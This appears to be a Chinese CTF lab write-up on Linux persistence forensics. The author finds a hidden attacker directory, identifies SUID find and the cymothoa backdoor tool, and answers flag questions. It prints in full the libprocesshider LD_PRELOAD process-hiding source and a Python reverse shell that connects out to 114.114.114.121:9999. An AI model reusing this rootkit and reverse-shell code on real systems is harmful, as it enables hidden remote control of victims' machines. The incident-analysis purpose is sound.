首页 > 系统相关 >第三章 权限维持-linux权限维持-隐藏-玄机靶场

第三章 权限维持-linux权限维持-隐藏-玄机靶场

时间:2024-11-02 18:46:18浏览次数:6  
标签:bin tmp name usr linux 权限 root python3 维持

第三章 权限维持-linux权限维持-隐藏-玄机靶场


linux权限维持玄机靶场自用笔记。

本篇文章来自lexsd6's home 师傅的分享,如有侵权请联系

题目简介

1.黑客隐藏的隐藏的文件 完整路径md5
2.黑客隐藏的文件反弹shell的ip+端口 {ip:port}
3.黑客提权所用的命令 完整路径的md5 flag{md5} 
4.黑客尝试注入恶意代码的工具完整路径md5
5.使用命令运行 ./x.xx 执行该文件  将查询的 Exec****** 值 作为flag提交 flag{/xxx/xxx/xxx}

1.黑客隐藏的隐藏的文件 完整路径md5

进入查询,发现vim的记录文件 .viminfo 读取它发现几个有意识到路径

Command Line History (newest to oldest):
:q!
:q
:wq

# Search String History (newest to oldest):

# Expression History (newest to oldest):

# Input Line History (newest to oldest):

# Input Line History (newest to oldest):

# Registers:

# File marks:
'0  1  0  /tmp/.temp/libprocesshider/1.py
'1  4  0  /tmp/.temp/libprocesshider/1.py
'2  12  40  /tmp/.temp/libprocesshider/processhider.c
'3  24  47  /tmp/.temp/libprocesshider/1.py
'4  2  1  /var/www/html/sh.php

发现libprocesshider 是一个Linux 持久性訪問到工具,1.py是这个工具所产生的执行文件。对这个目录文件 /tmp/.temp/libprocesshider/1.py 加密,提交 flag{109ccb5768c70638e24fb46ee7957e37}

2.黑客隐藏的文件反弹shell的ip+端口 {ip:port}

进行分析/tmp/.temp/libprocesshider/下的文件:

root@xuanji:~# cat /tmp/.temp/libprocesshider/processhider.c
#define _GNU_SOURCE

#include <stdio.h>
#include <dlfcn.h>
#include <dirent.h>
#include <string.h>
#include <unistd.h>

/*
 * Every process with this name will be excluded
 */
static const char* process_to_filter = "1.py";

/*
 * Get a directory name given a DIR* handle
 */
static int get_dir_name(DIR* dirp, char* buf, size_t size)
{
    int fd = dirfd(dirp);
    if(fd == -1) {
        return 0;
    }

    char tmp[64];
    snprintf(tmp, sizeof(tmp), "/proc/self/fd/%d", fd);
    ssize_t ret = readlink(tmp, buf, size);
    if(ret == -1) {
        return 0;
    }

    buf[ret] = 0;
    return 1;
}

/*
 * Get a process name given its pid
 */
static int get_process_name(char* pid, char* buf)
{
    if(strspn(pid, "0123456789") != strlen(pid)) {
        return 0;
    }

    char tmp[256];
    snprintf(tmp, sizeof(tmp), "/proc/%s/stat", pid);
 
    FILE* f = fopen(tmp, "r");
    if(f == NULL) {
        return 0;
    }

    if(fgets(tmp, sizeof(tmp), f) == NULL) {
        fclose(f);
        return 0;
    }

    fclose(f);

    int unused;
    sscanf(tmp, "%d (%[^)]s", &unused, buf);
    return 1;
}

#define DECLARE_READDIR(dirent, readdir)                                \
static struct dirent* (*original_##readdir)(DIR*) = NULL;               \
                                                                        \
struct dirent* readdir(DIR *dirp)                                       \
{                                                                       \
    if(original_##readdir == NULL) {                                    \
        original_##readdir = dlsym(RTLD_NEXT, #readdir);               \
        if(original_##readdir == NULL)                                  \
        {                                                               \
            fprintf(stderr, "Error in dlsym: %s\n", dlerror());         \
        }                                                               \
    }                                                                   \
                                                                        \
    struct dirent* dir;                                                 \
                                                                        \
    while(1)                                                            \
    {                                                                   \
        dir = original_##readdir(dirp);                                 \
        if(dir) {                                                       \
            char dir_name[256];                                         \
            char process_name[256];                                     \
            if(get_dir_name(dirp, dir_name, sizeof(dir_name)) &&        \
                strcmp(dir_name, "/proc") == 0 &&                       \
                get_process_name(dir->d_name, process_name) &&          \
                strcmp(process_name, process_to_filter) == 0) {         \
                continue;                                               \
            }                                                           \
        }                                                               \
        break;                                                          \
    }                                                                   \
    return dir;                                                         \
}

DECLARE_READDIR(dirent64, readdir64);
DECLARE_READDIR(dirent, readdir);
root@xuanji:~# 
root@xuanji:~# cat  /tmp/.temp/libprocesshider/1.py
#!/usr/bin/python3

import socket,subprocess,os,sys, time

pidrg = os.fork()
if pidrg > 0:
        sys.exit(0)

os.chdir("/")
os.setsid()
os.umask(0)
drgpid = os.fork()
if drgpid > 0:
        sys.exit(0)

while 1:
        try:
                sys.stdout.flush()
                sys.stderr.flush()
                fdreg = open("/dev/null", "w")
                sys.stdout = fdreg
                sys.stderr = fdreg
                sdregs=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
                sdregs.connect(("114.114.114.121",9999))
                os.dup2(sdregs.fileno(),0)
                os.dup2(sdregs.fileno(),1)
                os.dup2(sdregs.fileno(),2)
                p=subprocess.call(["/bin/bash","-i"])
                sdregs.close()
        except Exception:
                pass
        time.sleep(2)
root@xuanji:~#

发现在1.py 提到一个sdregs.connect(("114.114.114.121",9999)) ,flag{114.114.114.121:9999}

3.黑客提权所用的命令

用命令查询find / -perm -u=s -type f 2>/dev/null ,suid提权查询

root@xuanji:/tmp/.temp/libprocesshider# find / -perm -u=s -type f 2>/dev/null
/bin/mount
/bin/ping
/bin/ping6
/bin/su
/bin/umount
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/find
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/sudo
/usr/lib/eject/dmcrypt-get-device

发现find 可以进行


故flag为 /usr/bin/find md5加密,提交 flag{7fd5884f493f4aaf96abee286ee04120}

4.黑客尝试注入恶意代码的工具

执行find / -name '.*'查询隐藏文件。

/etc/.pwd.lock
/etc/cron.d/.placeholder
/etc/cron.daily/.placeholder
/etc/cron.hourly/.placeholder
/etc/cron.monthly/.placeholder
/etc/cron.weekly/.placeholder
/etc/init.d/.legacy-bootordering
/etc/skel/.bash_logout
/etc/skel/.bashrc
/etc/skel/.profile

/home/ctf/.bash_logout
/home/ctf/.bashrc
/home/ctf/.profile
/home/ctf/.bash_history
/opt/.cymothoa-1-beta

发现一个奇怪的目录/opt/.cymothoa-1-beta,cd 进去发现是一个工具目录:

root@xuanji:/opt/.cymothoa-1-beta# ls
Makefile  bgrep.c  cymothoa    cymothoa.h             payloads    personalization.h  syscalls.txt  udp_server.c
bgrep     core     cymothoa.c  hexdump_to_cstring.pl  payloads.h  syscall_code.pl    udp_server

查询发现是一个后门隐藏工具。

![image-20240708230421498](/Users/lexs/Library/Application Support/typora-user-images/image-20240708230421498.png)

故, /opt/.cymothoa-1-beta/cymothoa 加密,提交 flag{087c267368ece4fcf422ff733b51aed9}

5.使用命令运行 ./x.xx 执行该文件 将查询的 Exec** 值 作为flag提交

Cat 查看1.py:

root@xuanji:/opt/.cymothoa-1-beta# cat /tmp/.temp/libprocesshider/1.py
#!/usr/bin/python3

import socket,subprocess,os,sys, time

发现默认是“#!/usr/bin/python3” ,即pyton3运行1.py,

root@xuanji:~# python3 /tmp/.temp/libprocesshider/1.py
root@xuanji:~# netstat -alntp
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      11/apache2      
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      10/sshd         
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      -               
tcp        0      1 10.244.6.152:46896      114.114.114.121:9999    SYN_SENT    19439/python3   
tcp        0      1 10.244.6.152:48628      114.114.114.121:9999    SYN_SENT    -               
tcp        0      0 10.244.6.152:22         10.244.0.1:63226        ESTABLISHED 393/1           
tcp        0      1 10.244.6.152:48618      114.114.114.121:9999    SYN_SENT    -               
tcp        0      1 10.244.6.152:40544      114.114.114.121:9999    SYN_SENT    -               
tcp        0      0 10.244.6.152:22         10.244.0.1:4984         ESTABLISHED 9187/sshd: root@not
tcp6       0      0 :::22                   :::*                    LISTEN      10/sshd         
root@xuanji:~# whereis /python3 
python3: /usr/bin/python3 /usr/bin/python3.4 /usr/bin/python3.4m /etc/python3 /etc/python3.4 /usr/lib/python3 /usr/lib/python3.4 /usr/local/lib/python3.4 /usr/share/python3 /usr/share/man/man1/python3.1.gz
root@xuanji:~#ls -lab /usr/bin/python3
lrwxrwxrwx. 1 root root 9 Mar 23  2014 /usr/bin/python3 -> python3.4

where查询python3 位置,最后发现链接到 /usr/bin/python3.4

按题目要求提供完整的执行程序为flag :flag{/usr/bin/python3.4}
 

标签:bin,tmp,name,usr,linux,权限,root,python3,维持
From: https://blog.csdn.net/2401_83582688/article/details/143377794

相关文章

  • 后台管理系统的通用权限解决方案(十二)数据模型、基于SpringCloud和Nacos的后端项目搭
    后台管理系统的通用权限解决方案(一)如何自定义一个starter?后台管理系统的通用权限解决方案(二)SpringBoot整合SwaggerSpringfox实现接口日志文档后台管理系统的通用权限解决方案(三)SpringBoot整合Knife4j生成接口文档后台管理系统的通用权限解决方案(四)SpringBoot整......
  • [os/linux]:计算机中的编码和解码(ASCII)
    [os/linux]:计算机中的编码和解码(ASCII)    一、ASCII(AmericanStandardCodeForInformationInterchange)简介 1、在二进制的计算机中,ASCII用‘8位二进制数值’表示一个‘字符’;这样就形成了“字符”和“数值”之间的对应关系。ASCII表中的“字符”和“数值”,是......
  • 常见指令以及权限理解
    目录1.Linux下基本指令1.1ls指令1.2pwd命令1.3cd命令1.4touch指令1.5mkdir指令1.6 rmdir指令&&rm指令1.7man指令1.8cp指令1.9mv指令 1.10cat1.11more指令 1.12less指令1.13head指令 1.14tail指令1.15时间相关的指令1.16Cal指令1.17find......
  • Linux 操作系统下 e2label 命令介绍和使用案例
    Linux操作系统下e2label命令介绍和使用案例e2label命令介绍e2label是一个用于管理Linux文件系统卷标的命令行工具,主要支持EXT2、EXT3和EXT4文件系统。通过该命令,用户可以查看或修改分区的卷标,从而更好地组织和管理文件基本语法bashe2label[设备文件名][新卷......
  • 如何使用Ida Pro和Core Dump文件定位崩溃位置(Linux下无调试符号的进程专享)
    我们在嵌入式Linux开发过程中经常会遇到一个问题,就是程序崩溃后不知道具体位置。因为我们发布到生产环境的一般是没有调试符号的(使用strip或编译时加-s参数,CMake生成的编译指令中的-O3也会造成调试符号丢失),毕竟嵌入式的存储都比较有限,肯定是需要剥离调试符号的。另外一个......
  • Linux笔试题目记录(1)
    文章目录一、Linux文本三剑客---grep、sed、awk二、Linux内核模块相关命令三、Linux内核日志级别四、Linux内存管理之kmallockzallocvmallocmalloc和get_free_page()的区别五、Linux的调度策略六、(多选)下列哪些是linux驱动开发中常用的调试技术()七、简述GDB常见的调......
  • Linux常用命令
    Linux常用命令软件安装的方式1.使用yum安装yum-yinstall包的名称yum-yinstallpackage1package2#查看某个命令是哪个包的1.方式1yumprovidesrz#查看rz是属于哪个包的方式2yumsearchrz特点:(1)自动解决依赖(2)安装的位置是固定的,无法修改(3)......
  • Linux系统System V机制共享内存基础用法C++代码示例
    写数据进程代码//writer.cpp#include<iostream>#include<sys/ipc.h>#include<sys/shm.h>#include<cstring>#include<unistd.h>intmain(){//使用ftok()生成一个唯一的键用来标识共享内存,shmfile需要是一个存在的文件,也可以用其他方法来生成用来标识共......
  • 【Linux中的第一个小程序】进度条及printf打印彩色字符
    ......